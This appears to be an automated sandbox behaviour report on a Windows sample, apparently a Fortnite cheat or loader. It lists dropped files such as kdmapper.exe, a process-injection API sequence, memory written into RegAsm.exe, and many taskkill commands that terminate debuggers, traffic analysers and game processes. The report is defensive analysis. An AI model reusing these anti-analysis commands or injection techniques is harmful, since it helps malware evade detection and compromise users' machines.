Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C483284 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF60C483284
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C483728 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF60C483728
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C4838D0 SetUnhandledExceptionFilter,	0_2_00007FF60C4838D0
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953B2A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_00007FF6A953B2A8
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953B480 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00007FF6A953B480
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953B660 SetUnhandledExceptionFilter,	28_2_00007FF6A953B660
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	52_2_00EDF838
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDF9D5 SetUnhandledExceptionFilter,	52_2_00EDF9D5
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	52_2_00EDFBCA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	52_2_00EE8EBD
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D06CB42 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	65_2_6D06CB42
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D06C617 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	65_2_6D06C617
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D070ADC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	65_2_6D070ADC

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\Speech\physmeme.exe

Code function: 36_2_02AE2129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

36_2_02AE2129

Excessive usage of taskkill to terminate processes

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
